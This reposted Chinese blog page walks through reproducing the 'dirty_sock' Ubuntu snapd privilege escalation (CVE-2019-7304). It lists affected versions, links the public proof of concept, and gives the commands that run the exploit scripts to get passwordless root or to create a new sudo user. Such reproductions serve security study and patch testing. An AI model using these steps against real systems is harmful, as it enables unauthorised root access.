Ubuntu 提权漏洞(CVE-2019-7304)复现 - 走看看

zoukankan html css js c++ java

Ubuntu 提权漏洞(CVE-2019-7304)复现
漏洞描述：

Ubuntu 版本：

Ubuntu 18.10

Ubuntu 18.04 LTS

Ubuntu 16.04 LTS

Ubuntu 14.04 LTS

2.28 < snapd < 2.37 会存在该漏洞

Poc Github：https://github.com/initstring/dirty_sock

#1

注册并登陆，https://login.ubuntu.com/

在 Ubuntu 上，生成密钥
ssh-keygen -t rsa -C "your_email@example.com"
查看公钥

将公钥复制到网站上

接下来执行 poc
python3 ./dirty_sockv1.py -u "sch01ar@163.com" -k "../.ssh/id_rsa"
执行完之后 sch01ar 被修改为 Ubuntu 上的用户名

接着切换为 root 用户
sudo -i
切换成 root 用户时不需要输入密码

#2

直接运行脚本
python3 dirty_sockv2.py
执行完会生成一个 dirty_sock 的用户，密码也是这个
查看全文

相关阅读:
各类运算符练习
 用if语句把24小时制转换成12小时制
 Android课程---优化ListView列表视图
 Android课程---关于ListView列表视图的学习
 Android课程---时间日期对话框
 Android课程---关于对话框的学习
 Android课程---用进度条改变图片透明度
 Android课程---进度条及菜单的学习
 Android课程---final关键字
 Android课程---日历选择器和时间选择器

原文地址：https://www.cnblogs.com/sch01ar/p/10453368.html

热门文章
PHP基本语法
 html 手不能懒
 http://www.w3school.com.cn/
初学HTML 需要注意什么
 阶乘
 数组
 小九九
 阶乘
 语法练习
 FOR循环写等腰三角形

Copyright © 2011-2022 走看看